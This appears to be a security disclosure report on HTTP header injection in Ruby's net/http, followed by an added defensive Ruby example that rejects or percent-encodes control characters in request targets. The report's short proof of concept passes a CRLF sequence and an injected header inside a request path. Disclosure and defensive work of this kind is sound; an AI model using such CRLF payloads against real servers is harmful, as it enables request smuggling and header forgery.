#146416 Ruby:HTTP Header injection in 'net/http'

Posted by redrain root on Jun 24

TIMELINE
rootredrain submitted a report to Ruby.

Jun 22nd

Hi,

I would like to report an HTTP header injection vulnerability in
'net/http' that allows attackers to inject arbitrary headers into a
request, or even create a new evil request.

PoC

require 'net/http'
http = Net::HTTP.new('192.168.30.214','80')
res = http.get("/r.php HTTP/1.1\r\nx-injection: memeda")

Example

Server Code:…
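
A caller-side guard for the issue reported above, as an added example that is not part of the original report or of Ruby's own code. All names here (`check_request_target`, `encode_request_target`, `naive_request_head`, `header_lines`) are hypothetical, and `naive_request_head` is a constructed model of a client that performs no validation, not net/http's actual serialiser.

```ruby
# Raised when a request target could change the structure of the request.
class UnsafeRequestTarget < ArgumentError; end

# ASCII control characters (CR and LF included), space and DEL.
# None of them may appear raw in an HTTP/1.1 request target.
FORBIDDEN = /[\x00-\x20\x7f]/

# Strict mode: return the target unchanged or raise. Call this on any
# value derived from user input before handing it to http.get(target).
def check_request_target(target)
  raise UnsafeRequestTarget, 'target must start with "/"' unless target.start_with?('/')
  if (m = FORBIDDEN.match(target))
    raise UnsafeRequestTarget,
          format('forbidden byte 0x%02x at offset %d', m[0].ord, m.begin(0))
  end
  target
end

# Lenient mode: percent-encode forbidden bytes so they remain data
# inside the path instead of terminating the request line.
def encode_request_target(target)
  target.gsub(FORBIDDEN) { |c| format('%%%02X', c.ord) }
end

# Constructed model: how a client that does no validation would
# serialise the request head for a GET.
def naive_request_head(target, host)
  "GET #{target} HTTP/1.1\r\nHost: #{host}\r\n\r\n"
end

# Lines a server-side parser would see in the request head.
def header_lines(head)
  head.split("\r\n").reject(&:empty?)
end

# Constructed sample input, labelled as such.
SAMPLE_UNSAFE = "/r.php\r\nX-Constructed: 1"

if __FILE__ == $PROGRAM_NAME
  puts header_lines(naive_request_head(SAMPLE_UNSAFE, 'example.test')).inspect
  puts encode_request_target(SAMPLE_UNSAFE)
  begin
    check_request_target(SAMPLE_UNSAFE)
  rescue UnsafeRequestTarget => e
    puts "rejected: #{e.message}"
  end
end
```
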